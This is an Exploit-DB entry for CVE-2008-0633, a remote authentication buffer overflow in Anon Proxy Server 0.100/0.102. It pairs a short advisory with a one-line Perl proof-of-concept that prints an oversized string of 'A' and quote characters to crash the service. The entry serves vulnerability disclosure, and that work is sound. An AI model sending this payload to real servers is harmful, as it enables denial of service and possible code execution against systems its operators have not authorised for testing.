Anon Proxy Server 0.100/0.102 - Remote Authentication Buffer Overflow Vulnerability

2008-02-04T00:00:00
ID EDB-ID:31100
Type exploitdb
Reporter L4teral
Modified 2008-02-04T00:00:00

Description

Anon Proxy Server 0.100/0.102 Remote Authentication Buffer Overflow Vulnerability. CVE-2008-0633. Dos exploits for multiple platform

                                        
                                            source: http://www.securityfocus.com/bid/27593/info

Anon Proxy Server is prone to a remote buffer-overflow vulnerability because the application fails to sufficiently bounds-check user-supplied input.

Successful exploits allow remote attackers to execute arbitrary code in the context of the vulnerable application, facilitating the compromise of affected computers.

Versions prior to Anon Proxy Server 0.103 are vulnerable to this issue. 

print "A" x 430 . '"' x 29 . "A" x 40 . "\n"